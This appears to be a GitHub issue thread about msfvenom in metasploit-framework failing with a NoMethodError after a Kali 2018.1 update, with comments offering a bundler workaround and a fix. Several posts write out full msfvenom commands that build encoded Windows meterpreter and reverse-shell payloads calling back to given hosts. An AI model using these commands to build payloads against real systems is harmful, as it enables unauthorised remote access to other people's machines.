Metasploit-framework: Updates since Kali 2018.1 have broken msfvenom shikata_ga_nai encoding
Steps to reproduce
How'd you do it?
- On a clean Kali 2018.1 install with no updates running "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b 'x00' -i 3 -f exe > reverse_shell_tcp.exe" results in the following correct output
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > reverse_shell_tcp.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 73802 bytes
2. However, on a clean Kali 2018.1 install that has had a "apt-get update && apt-get dist-upgrade" performed as of April 4 2018, running the same command "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > reverse_shell_tcp.exe", results in the following error.
root@kali:~/test2# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > reverse_shell_tcp.exe
Traceback (most recent call last):
25: from /usr/bin/msfvenom:339:in `<main>'
24: from /usr/bin/msfvenom:55:in `framework'
23: from /usr/bin/msfvenom:46:in `init_framework'
22: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
21: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
20: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
19: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
18: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
17: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
16: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
15: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
14: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
13: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
11: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
10: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
9: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
8: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
7: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
6: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
5: from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
4: from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
3: from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:48:in `generate_jar'
2: from /usr/share/metasploit-framework/lib/msf/core/payload/uuid/options.rb:46:in `generate_uri_uuid_mode'
1: from /usr/share/metasploit-framework/lib/rex/payloads/meterpreter/uri_checksum.rb:70:in `generate_uri_uuid'
/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)
The version of metasploit-framework installed on a clean 2018.1 Kali install is "4.16.30-0kali3" and a dist-upgrade replaces it with "4.16.47-0kali1"
If this is a Kali packaging issue rather than a metasploit-framework issues I apologize - I haven't manually installed the latest metasploit-framework to test further. I'd appreciate any help you can provide, I haven't used "apt autoremove" to remove any old packages nor have I been prompted to. Is this a Ruby version issue?
Thanks.
brianreich
👍2
All 6 comments
Just to verify, I have the same error when using the -b switch as well, since updating this morning.
metasploit-framework/kali-rolling,now 4.16.47-0kali1 amd64 [installed]
"/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in
to_uri': undefined methodencode_base64url' for Rex::Text:Module (NoMethodError)"
SnakeMind
on 4 Apr 2018
👍2
I can confirm.
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.2.42 LPORT=9901 EXITFUNC=thread -b '\x00'
Traceback (most recent call last):
25: from /usr/bin/msfvenom:339:in `<main>'
24: from /usr/bin/msfvenom:55:in `framework'
23: from /usr/bin/msfvenom:46:in `init_framework'
22: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
21: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
20: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
19: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
18: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
17: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
16: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
15: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
14: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
13: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
11: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
10: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
9: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
8: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
7: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
6: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
5: from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
4: from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
3: from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_https.rb:48:in `generate_jar'
2: from /usr/share/metasploit-framework/lib/msf/core/payload/uuid/options.rb:46:in `generate_uri_uuid_mode'
1: from /usr/share/metasploit-framework/lib/rex/payloads/meterpreter/uri_checksum.rb:70:in `generate_uri_uuid'
/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)
Without the -b switch:
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.2.42 LPORT=9901 EXITFUNC=thread -f py -o test.py
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of py file: 1556 bytes
Saved as: test.py
rmbreak
on 4 Apr 2018
Running bundle exec with this also solves the issue just as in #9800
Curious that Kali apparently has patched this, but you're not seeing the patch in your Kali install?
busterb
on 5 Apr 2018
👍3
This also seems to be a working fix, though theoretically we shouldn't have to do it:
```
--- a/msfvenom
+++ b/msfvenom
@@ -5,6 +5,7 @@ class MsfVenomError < StandardError; end
class HelpError < StandardError; end
class UsageError < MsfVenomError; end
+require 'bundler/setup'
require 'optparse'
require 'timeout'
``
busterb
on 5 Apr 2018
👍1
@busterb The problem persists even after clearing the apt cache and running apt full-upgrade. Thanks for the workaround in the meantime.
rmbreak
on 5 Apr 2018
Fixed with #9817, this will take a day or so to filter down to apt packages.
jmartin-r7
on 5 Apr 2018
Was this page helpful?
0 / 5 - 0 ratings
Related issues
BaconBombz
·
3Comments
handsomebeast
·
3Comments
ejholmes
·
3Comments
idetest41
·
3Comments
0x27
·
3Comments
Most helpful comment
Running
bundle execwith this also solves the issue just as in #9800Curious that Kali apparently has patched this, but you're not seeing the patch in your Kali install?